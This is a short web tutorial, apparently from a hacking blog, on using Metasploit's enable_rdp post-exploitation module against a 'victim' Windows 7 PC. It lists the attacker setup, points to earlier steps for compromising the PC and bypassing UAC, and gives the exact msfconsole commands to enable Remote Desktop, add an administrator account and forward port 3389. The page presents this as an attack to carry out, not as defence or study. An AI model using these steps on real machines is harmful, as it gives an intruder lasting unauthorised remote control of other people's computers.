How to Enable Remote Desktop in Victim PC using Metasploit

This module enables the Remote Desktop Service (RDP). It provides the options to create an account and configure it to be a member of the Local Administrators and Remote Desktop Users group. It can also forward the target’s port 3389/tcp.

Exploit Targets

Windows 7

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

Step 1:  Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Step 2: Bypass the UAC Protection of Victim PC (Tutorial How to Bypass UAC Protection)

Step 3: Open your backtrack terminal and type msfconsole

msf > use post/windows/manage/enable_rdp

msf post(enable_rdp) > set session 2

msf post(enable_rdp) > exploit

3 Comments How to Enable Remote Desktop in Victim PC using Metasploit

Leave a Reply

Your email address will not be published. Required fields are marked *